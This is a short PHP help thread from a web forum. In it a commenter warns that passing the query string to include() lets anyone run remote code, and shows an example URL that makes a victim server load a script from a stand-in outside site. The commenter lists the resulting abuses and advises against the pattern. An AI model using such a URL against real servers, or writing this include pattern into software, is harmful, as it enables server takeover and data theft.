Vanilla 1 is no longer supported or maintained. If you need a copy, you can get it here.
HackerOne users: Testing against this community violates our program's Terms of Service and will result in your bounty being denied.
Php question
This discussion has been closed.
Comments
http://your.server.com/file.php?http://mysite.com/myillicitcode.php
that's right, include(), by default, will happily process files from remote sites.
which means i could write any code i wanted and your file would process it right there, in place.
which means i could write some code, to say, list out the entire contents of your directory tree and/or print the contents of any file from your site i want. or launch attacks on remote sites so that it looks like you're the attacker, or spam everyone on the planet, or whatever.
do you see what i'm saying now? it's simple enough to prevent this kind of thing. you cannot include things from the query string. you just can't.
I'll try to work on the wording of how my code is all layed out for ease of readability.
http://onemanshortproductions.com
So you can see what I'm working with, at least.
no, i didn't lose interest. can you try emailing me again? it's a gmail address, you shouldn't have any delivery problems.